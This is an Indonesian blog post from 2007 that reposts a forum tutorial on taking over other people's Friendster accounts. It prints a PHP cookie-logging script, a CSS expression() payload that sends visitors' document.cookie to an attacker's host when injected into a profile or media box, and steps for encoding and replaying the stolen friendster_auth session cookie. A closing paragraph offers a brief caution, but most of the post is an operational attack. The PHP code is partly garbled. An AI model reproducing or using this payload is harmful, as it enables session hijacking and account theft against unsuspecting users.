Harmony Clean Flat Responsive WordPress Blog Theme

how to hacking FS

17.31 Ecky A. 0 Comments Category :


Sesuai dengan yang saya katakana pada postingan sebelumnya ( hacking FS, how it can be, be careful about this..), sekarang akan saya kemukakan, salah satu cara menghacking account Friendster seseorang. Cara ini saya dapatkan dalam salah satu forum. Perlu diperhatikan bahwa saya belum pernah menggunakan teknik ini, karena teknik hacking (yang diberi tambahan judul –advance-) oleh penulisnya ini memerlukan waktu yang cukup lama untuk melakukan langkah-langkahnya, dan karena saya hanya bisa surfing diwarnet , saya merasa agak terlalu wasting time untuk mengaplikasikan teknik hacking ini. Ok, langsung saja…

[Tutorial] Hacking Friendster (In New CSS Profile) by Yunus510, Bandung-Stttelkom


Setelah begadang semaleman akhirnya ketemu juga caranya...

Banyak samanya sama thread sebelumnya cuma sekarang kita bisa nerapinnya di css profile friendster yang baru...
Kalo yang lama :

Quote:

Ga usah pake basa basi

Yang perlu di sediakan:

  1. Punya account FS (Wajib)
  2. Punya website yg support PHP
  3. Pake Firefox !! (Yay..!! FF Rules..!!)
  4. Extension Add n Edit Cookies, Download Buat FF 0.9 - 1.6 , Buat FF 2.0
  5. Rokok, Kopi and cemilan. Biar ga BT or Laper

Langkah² :

  1. Bikin file cook.php (nama diganti yg lain juga bisa). Isi dari file: PHP Code:

= $HTTP_GET_VARS['kukis'];
$filename = "cok.log";

// metoda dengan append append

$handle = fopen($filename, 'a');
fwrite($handle, $kokis);

fClose($handle);
// redirect-in ke punya tmn lo
echo "";

?>

  1. Upload file tersebut ke web hosting lw yg support PHP.
  2. Login ke FS
  3. Masuk ke edit profile yg bagian CSS (Customize)
  4. Paste code berikut di bagian CSS Code:
    body{
    height:expr/**/ession(document.location='http://www.site-elu.com/cook.php?kukis='+document.cookie)
    }
    Ganti www.site-elu.com dengan domain lw.

Udahh...
Loh kok udah..?? Trus nge-hacknya gimana..??

Sabar broo.. Setiap orang yg buka profile lw dengan browser Internet Explorer, cookiesnya akan tercatat di file cok.log di site lw.

Cara gunainnya:

  1. Buka _http://www.site-elu.com/cok.log
  2. Cari cookies dengan nama friendster_auth=, yang lain di biarin aja. Contoh hasil : Code:
    uid=33674163&lastclick=1163646748&cty=id&icty=au&m ac=
    ODEwYjgyMjE1ZDAwYTlkM2Q0NTc5ZjM3MmMyMzY3ODk*
    Replace karakter ascii "=" dengan %3D
    Replace karakter ascii "&" dengan %26
    Replace karakter ascii "*" dengan %2A
    Hasilnya : Code:
    uid%3D33674163&lastclick%3D1163646748&cty%3Did&ict y%3Dau&mac%3D
    ODEwYjgyMjE1ZDAwYTlkM2Q0NTc5ZjM3MmMyMzY3ODk%2A
  3. Bukan AnEC Cookie Editor Di FF
  4. Filter cookies dari Friendster.com
  5. Cari nama cookies friendster_auth, edit!
  6. Ganti contentnya dengan yg sudah kita dapat. Save! Cookies lain dari friendster boleh dihapus.
  7. Buka _http://www.friendster.com/ dan silahkan nyengir

NB:
Hanya bekerja pada browser Internet Explorer
Menerima sumbangan GRP dengan sukarela..

bedanya......:
yang sekarang kodenya dipaste ke media boxnya fs so ga pake ini lagi :

Code:

body{
height:expr/**/ession(document.location='http://www.site-elu.com/cook.php?kukis='+document.cookie)
}

trus yang dipaste di media box apaan donkz???

yang dipaste dimedia box ini :

Code:

style="height:expr/**/ession(document.location='http://WWW.WEBSITELUDISINI.COM/cook.php?kukis='+document.cookie)" />

kalo imagenya terserah mo diganti apa aja...


sekali lagi :
cuma support di IE...

regard...
GRP ga nolak....
buat yang mao nyempurnain silakan ajah... ni juga mikirnya sambil ngantuk ngantuk..

-yunus510-


Last edited by yunus510 : Yesterday at 10:09 AM.

Ehem ehem ….tampak disini kita lihat bahwa diperlukan pengetahuan tentang computer yang cukup dan waktu yang ada untuk dapat melakukannya, jadi tak salah kan jika pada postingan -hacking FS, how it can be, be careful about this..- , saya memberi judul kemungkinan kedua kenapa FS kita dihack, Ketahuilah, bahwa ada seseorang yang pintar dalam dunia computer tengah mengincar anda, karena bukanlah orang yang awan komputer yang dapat menggunakan teknik-teknik hacking advance.

So, cara minimal untuk menanggulangi hacking tersebut telah saya kemukakan dalam postingan - hacking FS, how it can be, be careful about this..-, dan jujur, walau dengan menulis ini, FS saya bukan berarti secure dari ancaman hacking. Marilah kita sama-sama hati-hati berselancar dalam dunia maya yang luas ini,, Otreh.. Sip, mantap!

===============================================================================

-EQ-

17 Juni 2007

RELATED POSTS

0 comments

Terima kasih atas apresiasinya :)
Klik beritahu saya untuk mendapatkan notifikasi komentar selanjutnya via email